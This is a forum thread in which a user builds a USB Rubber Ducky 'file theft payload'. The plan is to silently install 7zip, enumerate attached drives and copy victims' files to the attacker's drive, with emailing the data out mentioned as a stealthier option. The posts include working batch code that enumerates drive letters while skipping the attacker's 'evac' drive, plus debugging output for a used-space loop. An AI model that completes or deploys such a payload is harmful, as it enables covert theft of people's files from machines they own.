overwraith Posted November 4, 2012 Posted November 4, 2012 I am starting work on a Duckey USB file theft payload. The following codes will execute directly in the command prompt, and iterate through the possible drive letters, and ignore your "evac drive" (evac==evacuation) which will have a text file on the root evac.txt. The idea is to download 7zip, install it silently, then run the commands that will search out attached USB drives, and archive the files to your USB drive. The following is the code that will find the drives, and save them to a variable so we can send their locations to the 7zip application as arguments. REM SET THE FLAG FOR ENABLE DELAYED ENVIRONMENT VARIABLE EXPANSION REM FROM WHAT I UNDERSTAND THERE ARE INDIRECTION PROBLEMS WHEN NOT REM SET AND THE VARIABLE IS CALLED MULTIPLE TIMES ON THE SAME LINE cmd.exe /V:ON REM IF SOME TEXT IS NOT ASSIGNED TO THIS VARIABLE THE LOOP WILL FAIL AND REM CAUSE THE VARIABLE NAME TO BE ASSIGNED TO THE BEGINNING OF THE LIST Set targetDr=* REM THE FOR LOOP THAT SEEKS OUT SUITABLE DRIVES, HAS SOME NIFTY INDIRECTION REM OPERATORS "!" WHICH ARE USED WHEN THE VARIABLE IS CALLED MULTIPLE REM TIMES IN THE SAME LINE SO IT CAN TAKE ADVANTAGE OF THE ENABLED DELAYED REM EXPANSION WE SET EARLIER for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( IF NOT EXIST %a:\evac.txt If EXIST %a:\ SET targetDr=!targetDr! %a: ) REM REMOVE THE SINGLE CHARACTER OF TEXT WE ASSIGNED TO THE REM LIST VARIABLE EARLIER Set targetDr=%targetDr:~1% REM SHOW ME THE OUTPUT echo %targetDr% The next great hurdle in this payload will be figuring out a way to determine the size of the attached drives, so we can tell whether or not it is a flash drive by its disk size. We don't want to end up trying to copy a hard drive to a flash drive that's not big enough. If the "stealthyness" of this attack becomes a problem later, we can rely on something from the switchblade project to email the data to us. Quote
overwraith Posted November 5, 2012 Author Posted November 5, 2012 Started working on getting the used space on a drive, and I tried to make a "for" loop to do that too, and got some weird output. So for our resident bug hunters, does this look like a variable overflow situation? cmd.exe /V:ON Set /A usedSpace=0 for /R %i in (*) do Set /A usedSpace+=%~zi Yields> C:\>Set /A usedSpace+=8635 -1933490268 C:\>Set /A usedSpace+=5379 -1933484889 C:\>Set /A usedSpace+=22368 -1933462521 C:\>Set /A usedSpace+=2048 -1933460473 C:\>Set /A usedSpace+=844 -1933459629 C:\>Set /A usedSpace+=4726 -1933454903 C:\>Set /A usedSpace+=5182 -1933449721 C:\>Set /A usedSpace+=153298 -1933296423 C:\>Set /A usedSpace+=31 -1933296392 C:\>Set /A usedSpace+=1142784 -1932153608 C:\>Set /A usedSpace+=1630208 -1930523400 C:\>Set /A usedSpace+=540672 -1929982728 C:\> Quote
overwraith Posted December 6, 2012 Author Posted December 6, 2012 This is going to need approached from another language instead of batch. Mabe VBS, Python, or Powershell. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.